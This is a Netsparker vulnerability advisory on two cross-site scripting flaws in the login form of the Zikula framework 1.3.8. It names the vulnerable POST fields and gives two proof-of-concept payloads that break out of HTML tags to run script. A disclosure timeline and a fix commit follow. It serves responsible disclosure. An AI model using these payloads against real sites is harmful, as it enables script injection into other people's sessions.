Information
--------------------
Advisory by Netsparker.
Name: Multiple XSS Vulnerabilities in Zikula
Affected Software : Zikula
Affected Versions: 1.3.8 and possibly below
Vendor Homepage : http://zikula.org/
Vulnerability Type : Cross-site Scripting
Severity : Important
Netsparker Advisory Reference : NS-14-038

Description
--------------------
Zikula is an OpenSource PHP Application Framework, for your small to enterprise business or personal site.

Technical Details
--------------------
Proof of Concept URLs for XSS in Zikula:

http://example.com/zikula/index.php?module=users&type=user&func=login (POST, fields: authentication_method[modname] )
Users'"--></style></scRipt><scRipt>alert(0x000554)</scRipt>

http://example.com/zikula/index.php?module=users&type=user&func=login (POST, fields:authentication_info[login_id])
'"--></style></scRipt><scRipt>alert(0x00056C)</scRipt>

For more information on cross-site scripting vulnerabilities read the article Cross-site Scripting (XSS).

Advisory Timeline
--------------------
22/07/2014 - First Contact
24/07/2014 - Second Contact
15/8/2014 - Third Contact
03/12/2014 - Advisory released

Solution
--------------------
https://github.com/zikula/core/commit/aaaa0d4a6b636eecb0a4fb4c0450dc96861a7b5d

Credits & Authors
--------------------
These issues have been discovered by Omar Kurt while testing Netsparker Web Application Security Scanner.

About Netsparker
--------------------
Netsparker can find and report security issues and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications regardless of the platform and the technology they are built on. Netsparker's unique detection and exploitation techniques allows it to be dead accurate in reporting hence it's the first and the only False Positive Free web application security scanner.